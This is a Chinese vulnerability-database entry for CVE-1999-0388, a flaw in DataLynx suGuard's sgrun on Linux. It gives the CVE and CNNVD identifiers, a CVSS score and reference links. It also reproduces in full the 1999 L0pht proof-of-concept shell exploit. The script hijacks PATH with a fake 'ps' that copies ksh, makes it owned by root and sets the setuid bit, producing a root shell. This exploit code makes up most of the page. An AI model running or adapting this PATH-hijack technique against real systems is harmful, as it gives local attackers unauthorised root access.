DataLynx suGuard执行如:根命令漏洞

DataLynx suGuard执行如:根命令漏洞

漏洞ID 1105394 漏洞类型 未知
发布时间 1999-01-03 更新时间 2005-05-02
图片[1]-DataLynx suGuard执行如:根命令漏洞-安全小百科CVE编号 CVE-1999-0388
图片[2]-DataLynx suGuard执行如:根命令漏洞-安全小百科CNNVD-ID CNNVD-199901-006
漏洞平台 Linux CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/19146
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199901-006
|漏洞详情
DataLynxsuGuard信任PATH环境变量从而执行ps命令,本地用户利用该漏洞执行例如根命令。
|漏洞EXP
#source: http://www.securityfocus.com/bid/186/info
#
#A vulnerability exists within the DataLynx's suGuard program which allows a local attacker to gain administrative privilege by exploiting poor use of the /tmp directory and poor programming. 

#!/bin/sh
# sgrun exploit - the types of vulnerabilities that this exploit exercises
#  have no right being introduced to code in this day and age. Much less
#  code which presents itself under the pretenses of securing your system.
#   .mudge 01.02.99
#
SUSHI=./sushi

if [ $# -ne 2 ] ; then
  echo Must specify path to sgrun [/bin/datalynx/sgrun] and sgrun argument
  echo  [email protected] [01.02.99]
  exit 1
fi
  
SGRUN=$1
ARG=$2

if [ -f ${SUSHI} ] ; then
  echo root shell already created?
  exit
fi

echo datalynx sgrun proof of concept exploit from L0pht [[email protected]]
echo

cat > ./ps << FOEFOE
#!/bin/sh
cp /bin/ksh ${SUSHI}
chown root ${SUSHI}
chmod 4555 ${SUSHI}
FOEFOE

chmod 755 ./ps

PATH=.:${PATH}
export PATH

#/bin/datalynx/sgrun Identify 
${SGRUN} ${ARG}
if [ -f ${SUSHI} ] ; then
  echo root shell created as ${SUSHI}
  ls -l ${SUSHI}
  echo
fi
|参考资料

来源:OSVDB
名称:3186
链接:http://www.osvdb.org/3186

相关推荐: GOCR ReadPGM NetPBM Remote Client-Side Integer Overflow Vulnerability

GOCR ReadPGM NetPBM Remote Client-Side Integer Overflow Vulnerability 漏洞ID 1096880 漏洞类型 Boundary Condition Error 发布时间 2005-04-15 更…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享